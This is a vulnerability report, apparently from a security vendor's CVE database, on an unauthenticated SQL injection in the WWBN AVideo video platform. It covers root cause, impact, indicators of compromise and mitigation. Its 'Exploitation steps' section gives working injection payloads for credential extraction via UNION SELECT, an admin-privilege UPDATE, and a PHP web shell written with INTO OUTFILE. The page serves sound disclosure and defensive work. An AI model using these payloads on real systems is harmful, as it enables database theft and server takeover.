CVE-2026-33352: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33352 is a critical unauthenticated SQL injection vulnerability in WWBN AVideo, an open-source video streaming platform. The flaw exists in objects/category.php within the getAllCategories() method, where the doNotShowCats request parameter is insufficiently sanitized, allowing attackers to bypass the single-quote stripping defense using a backslash escape technique. All AVideo versions prior to 26.0 are affected. The vulnerability was disclosed on March 19, 2026 via GitHub Advisory GHSA-mcj5-6qr4-95fj and published to NVD on March 23, 2026. It carries a CVSS v3.1 base score of 9.8 (Critical) (GitHub Advisory).

Technical details

The root cause is improper neutralization of SQL special elements (CWE-89) in objects/category.php at lines 386–394. The only sanitization applied is str_replace("'", '', $value), which strips single quotes but does not strip backslashes. MySQL treats \ as an escape character inside string literals by default, so an attacker can send doNotShowCats[0]=\ and doNotShowCats[1]=) OR 1=1)-- -; the backslash in element 0 escapes the closing single-quote added by implode(), shifting the SQL string boundary and making element 1 executable SQL. The parameter is also absent from all global input filters defined in objects/security.php, and values are concatenated directly into the SQL query via implode() rather than using parameterized queries. UNION-based data extraction is possible by matching the column count of the original SELECT, e.g., doNotShowCats[1]=)) UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14 FROM users-- - (GitHub Advisory).

Impact

Successful exploitation grants an unauthenticated remote attacker full read access to the entire database, including user credentials, email addresses, private video metadata, API secrets, and plugin configuration. Integrity is fully compromised — attackers can modify or delete any database record, including escalating privileges via UPDATE users SET isAdmin=1. Availability is also at risk, as attackers can drop tables or corrupt data. On MySQL configurations that permit SELECT ... INTO OUTFILE, the attacker could write a PHP web shell to the server's document root, achieving remote code execution (GitHub Advisory, Feedly).

Exploitability

A public proof-of-concept exploit is available in the GitHub security advisory, providing concrete HTTP GET request payloads with specific URL-encoded parameters that can be executed directly against a vulnerable AVideo instance (GitHub Advisory). No authentication or user interaction is required, and attack complexity is low. As of the time of reporting, there is no confirmed evidence of in-the-wild exploitation, and no threat actor attribution has been made. The EPSS score is approximately 0.029% (0.000290), indicating a currently low but non-negligible probability of exploitation in the near term. The vulnerability is not listed in the CISA KEV catalog. Qualys scanner (detection ID 5009469) has added detection for this CVE (Feedly).

Exploitation steps

  1. Reconnaissance: Identify internet-facing AVideo instances (versions < 26.0) using search engines like Shodan or Censys, looking for the AVideo web interface or the /categories.json.php endpoint.
  2. Probe for vulnerability: Send a baseline request to confirm the endpoint is accessible: GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=%29%20OR%201%3D1%29--%20- and observe whether the response returns all categories (indicating the injected OR 1=1 evaluated to true).
  3. Determine column count: Iteratively probe with UNION SELECT statements of increasing column counts until a valid response is returned, confirming the number of columns in the original SELECT query.
  4. Extract data via UNION injection: Send a crafted UNION-based payload to extract credentials: GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=))%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14%20FROM%20users--%20- to retrieve usernames and password hashes from the users table.
  5. Escalate privileges (optional): Use stacked queries or subqueries to modify data, e.g., UPDATE users SET isAdmin=1 WHERE user='attacker', to gain administrative access to the AVideo platform.
  6. Achieve RCE (if MySQL permits): On configurations where SELECT ... INTO OUTFILE is enabled and secure_file_priv is not restrictive, write a PHP web shell to the document root: SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/AVideo/shell.php', then access it via HTTP to execute OS commands (GitHub Advisory).

Indicators of compromise

  • Network: Unusual HTTP GET requests to /categories.json.php containing doNotShowCats parameters with backslash characters (\), URL-encoded SQL keywords (UNION, SELECT, OR, FROM), or comment sequences (--); outbound connections from the web server to unexpected external hosts (potential RCE indicator).
  • Logs: Web server access logs showing repeated or automated requests to /categories.json.php with array-style parameters (doNotShowCats[0], doNotShowCats[1]) and encoded payloads; anomalous response sizes from /categories.json.php that differ significantly from baseline (indicating data exfiltration via UNION).
  • File System: Unexpected PHP files (e.g., shell.php, cmd.php) appearing in the AVideo document root or subdirectories, particularly if MySQL INTO OUTFILE was leveraged for RCE.
  • Database: Unexpected changes to user privilege levels (e.g., isAdmin flag set to 1 for non-admin accounts); unusual or unauthorized admin accounts created; database audit logs showing UNION SELECT queries or UPDATE/DROP statements originating from the web application user (GitHub Advisory).

Mitigation and workarounds

Upgrade AVideo to version 26.0 or later, which contains the patch for this vulnerability (GitHub Advisory). The fix replaces string concatenation with parameterized queries using placeholder binding, or at minimum applies $global['mysqli']->real_escape_string() to each value. As interim mitigations: restrict access to /categories.json.php via web server rules (e.g., block requests with doNotShowCats parameters containing backslashes); disable MySQL's INTO OUTFILE capability by setting secure_file_priv to a restricted or non-web-accessible directory to prevent RCE escalation; and apply network segmentation to limit direct database access. Monitor database activity for anomalous queries as a detective control (GitHub Commit).

Community reactions

The vulnerability received coverage from security news outlets including The Hacker Wire, which published an article titled "Critical Unauthenticated SQLi in WWBN AVideo" (The Hacker Wire). Security community discussion was noted on Mastodon and Bluesky shortly after the NVD publication on March 23, 2026. Security Online Info also covered the broader set of critical AVideo vulnerabilities (Security Online). The advisory was also picked up by threat intelligence aggregators including VulDB, CVEFeed, and Qualys, which added scanner detection.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management